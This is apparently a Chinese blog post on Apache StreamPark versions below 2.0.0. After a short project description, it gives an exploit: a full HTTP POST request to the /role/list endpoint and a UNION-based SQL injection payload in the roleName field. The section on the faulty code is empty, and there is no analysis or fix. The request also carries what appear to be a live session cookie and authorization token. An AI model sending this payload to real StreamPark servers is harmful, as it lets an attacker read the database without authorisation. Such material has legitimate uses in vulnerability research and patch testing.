项目地址
https://github.com/apache/incubator-streampark/
项目介绍
实时即未来,在实时处理流域 Apache Spark 和 Apache Flink 是一个伟大的进步,尤其是Apache Flink被普遍认为是下一代大数据流计算引擎, 我们在使用 Flink & Spark 时发现从编程模型, 启动配置到运维管理都有很多可以抽象共用的地方, 我们将一些好的经验固化下来并结合业内的最佳实践, 通过不断努力终于诞生了今天的框架 —— StreamPark, 项目的初衷是 —— 让流处理更简单, 使用StreamPark开发,可以极大降低学习成本和开发门槛, 让开发者只用关心最核心的业务,StreamPark 规范了项目的配置,鼓励函数式编程,定义了最佳的编程方式,提供了一系列开箱即用的Connectors,标准化了配置、开发、测试、部署、监控、运维的整个过程, 提供了scala和java两套api, 其最终目的是打造一个一站式大数据平台,流批一体,湖仓一体的解决方案。
项目版本
<2.0.0
缺陷代码
漏洞利用
POST /role/list HTTP/1.1
Host: 172.25.1.115:10000
Content-Length: 49
Accept: application/json, text/plain, */*
Authorization: 69qMW7reOXhrAh29LjPWwwP+quFqLf++MbPbsB9/NcTCKGzZE2EU7tBUBU5gqG236VF5pMyVrsE5K7hBWiyuLgd6tS1UQX8NYY0iS1sltnjM9rKUc9KrTdfeZDwGXWagjRm+FvBGU9PgJUMgsdljv9bojr6iTBNSPbzWhZ5HS8yLgqwZkFUuVQHCKCwkmL/Ftxe74jENeEEZlsXmJJ49Iw==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://172.25.1.115:10000
Referer: http://172.25.1.115:10000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=9bQXZ2nYBKMTEvAWLRKLEw4F3d0N7s63eOA5tPY7
Connection: close
pageNum=1&pageSize=10&roleName=1111&teamId=100000
Payload: pageNum=1&pageSize=10&roleName=1111') UNION ALL SELECT CHAR(113)||CHAR(112)||CHAR(118)||CHAR(107)||CHAR(113)||CHAR(99)||CHAR(87)||CHAR(116)||CHAR(65)||CHAR(80)||CHAR(70)||CHAR(97)||CHAR(67)||CHAR(104)||CHAR(116)||CHAR(79)||CHAR(118)||CHAR(79)||CHAR(81)||CHAR(102)||CHAR(71)||CHAR(74)||CHAR(84)||CHAR(107)||CHAR(70)||CHAR(73)||CHAR(85)||CHAR(109)||CHAR(72)||CHAR(118)||CHAR(82)||CHAR(117)||CHAR(114)||CHAR(76)||CHAR(111)||CHAR(80)||CHAR(65)||CHAR(75)||CHAR(115)||CHAR(85)||CHAR(111)||CHAR(90)||CHAR(98)||CHAR(110)||CHAR(101)||CHAR(113)||CHAR(113)||CHAR(98)||CHAR(98)||CHAR(113)-- rpTW&teamId=100000
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
